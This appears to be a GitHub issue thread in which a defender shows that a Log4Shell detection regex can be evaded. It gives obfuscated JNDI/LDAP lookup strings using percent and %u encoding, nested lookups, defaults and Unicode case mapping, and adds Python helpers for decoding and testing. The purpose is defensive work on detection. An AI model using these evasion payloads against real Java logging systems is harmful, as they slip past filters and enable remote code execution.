Regex can be bypassed. #3
Comments
Hi, thanks for the issue. I used it, among other things, to incorporate a few optimizations into my RegEx. Some comments on your suggestions follow:
The
Already, the old RegEx allowed for escaping of safe characters in general, though it didn't handle double encoding of safe characters correctly. The upcoming version will.
It's not my intent to "lull" someone into something. I'll put a comment into the README so everyone can understand.
You’re right, in my haste I missed a conditional, which I’ve fixed in the original message. It now shows both your regex and my collection as catching the first. One thing to be mindful of here, though, is that you’re headed down the path of handling all sorts of encodings within the one regex. For example, there was, for at least a brief while, a non-standard but not uncommon percent escaping for Unicode:
>>> esc_pu = lambda s: "".join("%%%s" % hex(ord(c))[2:] if ord(c) < 256 else "%%u%s" % hex(ord(c))[2:].rjust(4, "0") for c in s)
>>> s3 = esc_pu('${jnd${upper:ı}:ldap://')
>>> s3
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%3a%6c%64%61%70%3a%2f%2f'
>>> BACK2ROOT_RE.search(s3) or False
False
>>> pprint(test(s3))
{'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 48), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d'>,
'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>,
'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>}
If the goal is to be resistant to unwrapping attacks against a diverse range of stacks, then you may as well make sure alterations like this don’t also result in false negatives. I’m unsure where you could expect to see this encoding nowadays, though. Interestingly though neither my
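One way to avoid teaching a single regex every encoding is to normalize the input first and match afterwards. The following is only a rough sketch under that assumption: `unescape_once` and `unescape_fully` are hypothetical helper names, not part of either regex collection in this thread, and the decoder only understands `%XX` and the non-standard `%uXXXX` form shown above.

```python
import re

# One escape: either the non-standard %uXXXX form or a plain %XX byte.
_ESCAPE = re.compile(r"%(?:u([0-9a-fA-F]{4})|([0-9a-fA-F]{2}))")


def unescape_once(s):
    """Decode a single layer of %XX / %uXXXX escapes (code point based)."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def unescape_fully(s, max_rounds=8):
    """Decode repeatedly until nothing changes, to undo double encoding.

    max_rounds is an arbitrary safety bound chosen for this sketch.
    """
    for _ in range(max_rounds):
        decoded = unescape_once(s)
        if decoded == s:
            break
        s = decoded
    return s


s3 = "%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%3a%6c%64%61%70%3a%2f%2f"
print(unescape_once(s3))                 # ${jnd${upper:ı}:ldap://
print(unescape_fully("%2524%257bjndi"))  # ${jndi
```

Normalizing like this carries its own assumption, namely that the decoder mirrors what the target stack actually does, so it shifts the problem rather than removing it.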
Neat! It is frankly difficult to tell what the regex can and can’t catch due to its complexity.
I do not think it is your intent, but I think it is a possible outcome. One of the hardest parts about being on a blue team is that, by definition, you get popped when you miss something, so it is crucial to understand fully what you can and cannot catch. Grabbing a “comprehensive” regex like this, where it is unlikely that its use will come with an understanding of its assumptions and limitations, can turn out to be dangerous. Encoding assumptions into your detections will always open up surreptitious paths for violating those assumptions. As another example:
>>> s4 = '${env:ZILCH:-jnd${lower:${upper:ı}}://addr'
>>> BACK2ROOT_RE.search(s4) or False
False
>>> pprint(test(s4))
{'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
'ANY_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'ANY_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'NESTED_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
'NESTED_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'NESTED_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>}
I can’t easily tell you why your regex isn’t catching this one due to its overall complexity (my best guess is that it doesn’t handle defaults and/or some forms of nested evaluation), and I’m actually surprised, as I’d have assumed that it would. This is the danger I’m speaking of: if I were running your detection and relying on it, I would likely assume that this would be caught and thus never notice that it wasn’t.
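To make "what can and can't we catch" something you can read off rather than assume, one option is a small coverage table of samples against detectors. This is a minimal sketch only: the two patterns below are deliberately simple, hypothetical stand-ins (not `BACK2ROOT_RE` or any regex from the gist), and `coverage` is an invented helper name.

```python
import re

# Hypothetical, deliberately naive detectors used only for illustration.
DETECTORS = {
    "LITERAL_JNDI": re.compile(r"\$\{jndi:"),
    "ANY_LOOKUP": re.compile(r"\$\{"),
}

SAMPLES = [
    "${jndi:ldap://addr}",
    "${env:ZILCH:-jnd${lower:${upper:ı}}://addr",
    "plain log line",
]


def coverage(samples, detectors):
    """Return {sample: {detector name: True if it matched, else False}}."""
    return {
        sample: {name: bool(rx.search(sample)) for name, rx in detectors.items()}
        for sample in samples
    }


for sample, hits in coverage(SAMPLES, DETECTORS).items():
    print(sample, hits)
```

Any sample where a detector you rely on reports `False` is a known gap rather than a silent one, which is the point of keeping such a corpus next to the regex.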
Compare against https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6
The (?:%(25)*24|%) idea is neat, and I even incorporated it briefly (along with (?:%(25)*5c|\\)), but it assumes you’ll only ever escape URL-unsafe characters, and a smart attacker is of course going to violate that assumption. It is better not to lull your defender into a false sense of security, and this is why I have test_thorough.
This regex also does not detect Unicode case mapping attacks, but the gist I’ve shared with you before does, by avoiding the assumptions that result in the possible evasion entirely.
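For readers unfamiliar with the case mapping trick, here is a small illustration. It is a sketch under stated assumptions: Python's `str.upper` and `str.lower` stand in for the target's case conversion, `resolve_case_lookups` is a hypothetical helper, and it only evaluates `${lower:...}` and `${upper:...}`, nothing else.

```python
import re

# Innermost ${lower:...} or ${upper:...} with no "$", "{" or "}" in its argument.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")


def resolve_case_lookups(s):
    """Evaluate innermost lower/upper lookups repeatedly until none remain."""

    def _apply(m):
        op, arg = m.group(1), m.group(2)
        return arg.lower() if op == "lower" else arg.upper()

    prev = None
    while prev != s:
        prev, s = s, _CASE_LOOKUP.sub(_apply, s)
    return s


# U+0131 (dotless i) uppercases to a plain ASCII "I".
print(resolve_case_lookups("${jnd${upper:ı}:ldap://"))  # ${jndI:ldap://
print(resolve_case_lookups("jnd${lower:${upper:ı}}"))   # jndi
```

Neither input contains the letter "i" anywhere, so a detection that looks for a literal "jndi" (in any case) never sees it, even though evaluation produces it.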